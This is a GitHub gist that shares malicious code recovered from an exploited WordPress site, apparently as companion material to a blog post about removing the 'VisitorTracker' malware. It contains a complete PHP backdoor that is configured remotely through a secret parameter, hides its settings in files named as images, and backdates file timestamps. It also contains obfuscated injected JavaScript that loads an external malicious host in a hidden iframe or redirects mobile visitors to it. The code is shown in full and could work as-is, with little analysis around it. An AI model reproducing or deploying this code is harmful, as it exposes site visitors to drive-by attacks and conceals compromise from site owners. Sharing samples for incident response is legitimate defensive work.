Last active
October 6, 2015 19:37
-
-
Save soyarsauce/9b90b7784a44666316c9 to your computer and use it in GitHub Desktop.
Obfuscated PHP code on an exploited WordPress site http://wingho.io/clearing-visitortracker-malware-wordpress-website
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
if(!defined("CUR_PATH")){ | |
define("CUR_PATH",dirname(__FILE__) . DIRECTORY_SEPARATOR); | |
} | |
if(!defined("SETTINGS_FILE")){ | |
define("SETTINGS_FILE",CUR_PATH."img.jpg"); | |
} | |
if(!defined("LOG_FILE")){ | |
define("LOG_FILE",CUR_PATH."dot.jpg"); | |
} | |
if(!defined("IS_AJAX")){ | |
define("IS_AJAX",false); | |
} | |
check_exist_all(); | |
$pname = "UEYJHJSDHUEYBSJDHUWYE"; | |
$SETTS = unserialize(@file_get_contents(SETTINGS_FILE)); | |
if( | |
(isset($_POST[$pname]) && !empty($_POST[$pname]) && strlen($_POST[$pname]) >0) | |
|| (isset($_GET[$pname]) && !empty($_GET[$pname]) && strlen($_GET[$pname]) >0) | |
){ | |
$new_setts = $SETTS; | |
$ret = array(); | |
if(isset($_POST[$pname])){ | |
$new_setts["status"] = $_POST[$pname."_status"]; | |
$new_setts["u"] = base64_encode($_POST[$pname."_u"]); | |
$new_setts["f"] =$_POST[$pname."_f"]; //_#_ | |
$new_setts["ct"] = $_POST[$pname."_ct"]; | |
$new_setts["code"] = $_POST[$pname."_code"]; | |
$new_setts["mobile_on"] = $_POST[$pname."_mobon"]; | |
$new_setts["log"] = $_POST[$pname."_nlog"]; | |
$new_setts["debug"] = $_POST[$pname."_debug"]; | |
$new_setts["pts"] = base64_decode($_POST[$pname."_pts"]); | |
}else if(isset($_GET[$pname])){ | |
$data = base64_decode($_GET[$pname]); | |
$data = explode("||__||",$data); | |
$new_setts["status"] = $data[0]; | |
$new_setts["u"] = base64_encode($data[1]); | |
$new_setts["f"] = $data[2]; //_#_ | |
$new_setts["ct"] = $data[3]; | |
$new_setts["code"] = $data[4]; | |
$new_setts["mobile_on"] = $data[5]; | |
$new_setts["log"] = $data[6]; | |
$new_setts["debug"] = $data[7]; | |
$new_setts["pts"] = base64_decode($data[8]); | |
}else{ | |
exit(); | |
} | |
$server_script_dir = detect_doc_root($new_setts["pts"]).DIRECTORY_SEPARATOR.$new_setts["pts"].DIRECTORY_SEPARATOR; | |
$ret["pts"] = $server_script_dir; | |
$ret["script_path"] = $server_script_dir.basename($_SERVER["SCRIPT_NAME"]); | |
@file_put_contents(SETTINGS_FILE,serialize($new_setts)); | |
$touch_exists = false; | |
if(file_exists(SETTINGS_FILE)){ | |
$ftime = @stat(SETTINGS_FILE); | |
$touch_exists = $ftime["mtime"]; | |
} | |
make_touch(SETTINGS_FILE,$touch_exists,true); | |
echo base64_encode("OKSETTS")."OKSETTSOK_START:".base64_encode(json_encode($ret))."-END";exit();; | |
exit(); | |
} | |
if((isset($_GET[$pname."_test"]) && !empty($_GET[$pname."_test"]) && strlen($_GET[$pname."_test"]) >0)){ | |
show_good_js($SETTS["u"],base64_decode($SETTS["code"])); | |
echo "\r\n\r\n_______________________\r\n\r\n"; | |
echo base64_encode("OKSETTS"); | |
echo "\r\n\r\n_______________________\r\n\r\n"; | |
var_dump($SETTS); | |
echo "\r\n\r\n_______________________\r\n\r\n"; | |
if(file_exists(LOG_FILE)){ | |
echo file_get_contents(LOG_FILE); | |
}else{ | |
echo "No log"; | |
} | |
exit(); | |
} | |
if((isset($_GET[$pname."_shlog"]) && !empty($_GET[$pname."_shlog"]) && strlen($_GET[$pname."_shlog"]) >0)){ | |
if(file_exists(LOG_FILE)){ | |
echo file_get_contents(LOG_FILE); | |
}else{ | |
echo "No log"; | |
} | |
exit(); | |
} | |
if(IS_AJAX){ | |
if(!isset($_SERVER["HTTP_CONTENT_TYPES"]) || strpos($_SERVER["HTTP_CONTENT_TYPES"],$_SERVER["SERVER_NAME"])===false){ | |
exit(); | |
} | |
} | |
if(isset($_GET["mob"]) && !empty($_GET["mob"]) && strlen($_GET["mob"]) >0 && $SETTS["mobile_on"] == 1){ | |
$f = true; | |
$is_mob = true; | |
}else{ | |
$is_mob = false; | |
$SETTS["f"] = (!empty($SETTS["f"]) && $SETTS["f"] != ""?explode("_#_",$SETTS["f"]):array());//explode("_#_",$SETTS["f"]) | |
$f = false; | |
$ua = $_SERVER["HTTP_USER_AGENT"]; | |
if(!empty($SETTS["f"])){ | |
foreach($SETTS["f"] as $one){ | |
/*if(preg_match("|".preg_quote($one).".*?([0-9\.]+)|i", $ua, $match)){ | |
$f = true; | |
break; | |
}*/ | |
if(strpos($one,"*")!==false){ | |
if (preg_match("|".$one."|i", $ua, $match)){ | |
$f = true; | |
break; | |
} | |
}else{ | |
if (preg_match("|".preg_quote($one).".*?([0-9\.]+)|i", $ua, $match)) | |
{ | |
$f = true; | |
break; | |
} | |
} | |
} | |
} | |
} | |
if($SETTS["debug"] == 1){ | |
$f = true; | |
$SETTS["u"] = base64_encode("http://google.com"); | |
} | |
if($f && $SETTS["log"] == 1){ | |
@file_put_contents(LOG_FILE,"[".date("Y-m-d H:i:s")."]: ".$ua."\r\n",FILE_APPEND); | |
$touch_exists = false; | |
if(file_exists(LOG_FILE)){ | |
$ftime = @stat(LOG_FILE); | |
$touch_exists = $ftime["mtime"]; | |
} | |
make_touch(LOG_FILE,$touch_exists,true); | |
} | |
if($f && $SETTS["status"] == 1 && !empty($SETTS["u"]) && strlen($SETTS["u"])>0){ | |
$check_cook = get_cookie("is_uniq"); | |
if(!$check_cook || $SETTS["ct"] == 0){ | |
set_cookie("is_uniq","1",(time()+$SETTS["ct"])); | |
if($is_mob){ | |
show_js_redirect($SETTS["u"]); | |
}else{ | |
show_good_js($SETTS["u"],base64_decode($SETTS["code"])); | |
} | |
}else{ | |
show_bad_js(); | |
} | |
}else{ | |
show_bad_js(); | |
} | |
exit(); | |
function check_exist_all(){ | |
if(!@file_exists(SETTINGS_FILE)){ | |
@file_put_contents(SETTINGS_FILE,serialize(array("status"=>0,"u"=>"","f"=>"","ct"=>0,"code"=>"","pts"=>"","log"=>-1,"debug"=>-1,"mobile_on"=>-1))); | |
$touch_exists = false; | |
if(file_exists(SETTINGS_FILE)){ | |
$ftime = @stat(SETTINGS_FILE); | |
$touch_exists = $ftime["mtime"]; | |
} | |
make_touch(SETTINGS_FILE,$touch_exists,true); | |
} | |
} | |
function show_bad_js(){ | |
if(!IS_AJAX){ | |
header("content-type: application/x-javascript"); | |
} | |
echo "/*".time()."*/"; | |
} | |
function show_good_js($e_url,$code){ | |
$e_url = base64_decode($e_url); | |
$code = str_replace(array("{%%EK_URL%%}"),array($e_url),$code); | |
if(!IS_AJAX){ | |
header("content-type: application/x-javascript"); | |
} | |
echo $code; | |
} | |
function show_js_redirect($e_url){ | |
$e_url = base64_decode($e_url); | |
header("content-type: application/x-javascript"); | |
$redirect = "if ((navigator.userAgent.match(/iPhone/i)) || (navigator.userAgent.match(/iPod/i))) {location.replace('".$e_url."');}else{window.location = '".$e_url."';document.location = '".$e_url."';}"; | |
echo $redirect; | |
} | |
function detect_doc_root($path_to_script){ | |
$path_to_script = str_replace("//","/",$path_to_script); | |
if(substr($path_to_script,0,1) == "/"){ | |
$path_to_script = substr_replace($path_to_script, "", 0,1); | |
} | |
$full_path = realpath(dirname(__FILE__)); | |
if($path_to_script == ""){ | |
$doc_root = $full_path; | |
}else{ | |
$doc_root = str_replace(DIRECTORY_SEPARATOR.$path_to_script,"",$full_path); | |
} | |
return $doc_root; | |
} | |
function rand_string($min = 2,$max = false){ | |
$abc = "qwertyuiopasdfghjklzxcvbnm"; | |
$abc_up = strtoupper($abc); | |
$abc = str_split($abc); | |
$abc_up = str_split($abc_up); | |
$abc = array_merge($abc,$abc_up); | |
$return = array(); | |
if(!$max || $max <= $min){ | |
$max = $min + $min; | |
} | |
for($i =$min; $i <= $max; $i++){ | |
$return[] = $abc[array_rand($abc)]; | |
} | |
return implode("",$return); | |
} | |
function set_cookie($name = "", $value = "", $expire = 1, $path = "/"){ | |
return setcookie(md5($name),$value,$expire,$path,"",false,true); | |
} | |
function get_cookie($name = ""){ | |
if(isset($_COOKIE[md5($name)]) && !empty($_COOKIE[md5($name)])){ | |
return $_COOKIE[md5($name)]; | |
}else{ | |
return false; | |
} | |
} | |
function make_touch($fpath,$touch_exist = false,$touch_par_dir = false){ | |
$ttime = 0; | |
if($touch_exist){ | |
$ttime = $touch_exist; | |
}else{ | |
$ttime = get_some_touch($fpath); | |
} | |
@touch($fpath,$ttime); | |
if($touch_par_dir===true){ | |
$fpath = explode(DIRECTORY_SEPARATOR,$fpath); | |
array_splice($fpath, (count($fpath)-1), 1); | |
$fpath= implode(DIRECTORY_SEPARATOR,$fpath); | |
if(substr($fpath, -1) != DIRECTORY_SEPARATOR) | |
$fpath= $fpath.DIRECTORY_SEPARATOR; | |
@touch($fpath,$ttime); | |
} | |
} | |
function get_some_touch($fpath){ | |
$fpath = explode(DIRECTORY_SEPARATOR,$fpath); | |
array_splice($fpath, (count($fpath)-1), 1); | |
$fpath= implode(DIRECTORY_SEPARATOR,$fpath); | |
if(substr($fpath, -1) != DIRECTORY_SEPARATOR) | |
$fpath= $fpath.DIRECTORY_SEPARATOR; | |
$dirs = array_diff(scandir($fpath),array(".","..")); | |
$touches = array(); | |
foreach($dirs as $one){ | |
$stat = stat($fpath.$one); | |
$touches[] = $stat['mtime']; | |
} | |
//asort($touches); | |
sort($touches, SORT_NUMERIC); | |
if(isset($touches[0]) and !empty($touches) and $touches[0]>0) | |
return $touches[0]; | |
else | |
return (time() - (3600*24*30 * 12)); | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<script type="text/javascript" id="id_2649819"> | |
function lNvpGvHOLiehBHBMLYbvPlJrpgWOsYuTZmucBDLtR() { | |
var e = "id_2649819"; | |
if ("none" != e) { | |
var i = document.getElementById(e); | |
void 0 != typeof i && null != i && (i.outerHTML = "", delete i) | |
} | |
} | |
function gKQltxDpZWJOZHmDbcAsNLSXWNYdgxHFYU() { | |
return document.all && !document.compatMode ? !0 : document.all && !window.XMLHttpRequest ? !0 : document.all && !document.querySelector ? !0 : document.all && !document.addEventListener ? !0 : document.all && !window.atob ? !0 : document.all ? !0 : "undefined" != typeof navigator.maxTouchPoints && !document.all && iTtrcUzkbhIRdSfHGyFsHFDMrjpOTlRTzyhC() ? !0 : !1 | |
} | |
function iTtrcUzkbhIRdSfHGyFsHFDMrjpOTlRTzyhC() { | |
var e = window.navigator.userAgent, | |
i = e.indexOf("MSIE "); | |
if (i > 0) return parseInt(e.substring(i + 5, e.indexOf(".", i)), 10); | |
var t = e.indexOf("Trident/"); | |
if (t > 0) { | |
var n = e.indexOf("rv:"); | |
return parseInt(e.substring(n + 3, e.indexOf(".", n)), 10) | |
} | |
var o = e.indexOf("Edge/"); | |
return o > 0 ? parseInt(e.substring(o + 5, e.indexOf(".", o)), 10) : !1 | |
} | |
function BvYpXdZglDLRdNvGFNxeifOmYPRQhQg() { | |
var e = window.navigator.userAgent.toLowerCase(); | |
return /(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(e) || /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(e.substr(0, 4)) ? !0 : !1 | |
} | |
var NSwtIQNTEWGEUlrSDDgdDjIKZwWnWSHsHxyn = setInterval(function() { | |
if (null != document.body && "undefined" != typeof document.body) { | |
if (clearInterval(NSwtIQNTEWGEUlrSDDgdDjIKZwWnWSHsHxyn), "undefined" == typeof window.v_35763a2628ec5f7420be3779607dfe04) { | |
window.v_35763a2628ec5f7420be3779607dfe04 = 1; | |
var e = iTtrcUzkbhIRdSfHGyFsHFDMrjpOTlRTzyhC() && gKQltxDpZWJOZHmDbcAsNLSXWNYdgxHFYU(), | |
i = !e && !!window.chrome && "Google Inc." === window.navigator.vendor, | |
t = -1, | |
n = "http://zxcgheytergfdgdfg.cf/052F"; | |
if (BvYpXdZglDLRdNvGFNxeifOmYPRQhQg() && 1 == t) navigator.userAgent.match(/iPhone/i) || navigator.userAgent.match(/iPod/i) ? location.replace(n) : (window.location = n, document.location = n); | |
else if (e && !i && !BvYpXdZglDLRdNvGFNxeifOmYPRQhQg()) { | |
var o = '<div style="position:absolute;left:-3532px;"><iframe width="10px" src="' + n + '" height="10px"></iframe></div>', | |
a = document.getElementsByTagName("div"); | |
if (0 == a.length) document.body.innerHTML = document.body.innerHTML + o; | |
else { | |
var d = a.length, | |
r = Math.floor(d / 2); | |
a[r].innerHTML = a[r].innerHTML + o | |
} | |
} | |
} | |
lNvpGvHOLiehBHBMLYbvPlJrpgWOsYuTZmucBDLtR() | |
} | |
}, 100); | |
</script> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Gists for blog post:
http://wingho.io/clearing-visitortracker-malware-wordpress-website